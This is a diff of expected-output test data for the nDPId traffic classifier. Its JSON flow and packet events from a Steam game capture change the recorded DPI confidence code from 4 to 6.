00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC\/AqLyVRI50srJhaYkALCSiVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1357332165289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165289,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYoALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1357332165291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165291,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUUAAIARDl7Qb4VUwKi8lWmKsmEANGnGVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAD\/WHUH0BAAA="} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1357332165310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165310,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUYAAIARquBEjnSywKi8lWmJsmEANI39VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA\/x7bdLIAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1357332165330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165330,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUcAAIAR3b5IpT28wKi8lWmKsmEANK1cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAARbG1YaUAAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYoALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYoALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYkALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1357332165344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165344,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUgAAIARDlrQb4VVwKi8lWmJsmEANOC5VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApkPUDiMBAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1357332165370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165370,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUkAAIARjVZFHJGrwKi8lWmKsmEANABlVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAZ1y1R+AAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1357332165375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165375,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUoAAIAR3cdIpT2wwKi8lWmJsmEANEZJVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApDC7AqgAAAA="} 
@@ -206,61 +206,61 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1357332165425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165425,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUwAAIAROcmSQpgPwKi8lWmJsmEANKyjVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAEZL3SfQAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1357332165520,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165520,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWU0AAIAROcmSQpgOwKi8lWmKsmEANHO2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAoWZRYkMBAAA="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1357332165586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1357332165586,"pkt":"AFBW4RiuAAwp3FvtCABFAABEAABAAEARNwrAqLyVSKU9vLJhaYoAMEhAVlMwMQQAAwQABgAAAAAAAAEAAAABAAAAAQAAAAEAAAAEAAAAbm6TxQ=="} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
